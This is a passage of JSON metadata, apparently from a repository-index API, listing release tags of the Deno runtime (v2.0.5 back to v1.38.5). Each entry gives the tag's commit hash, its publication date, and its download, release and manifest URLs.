tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:gi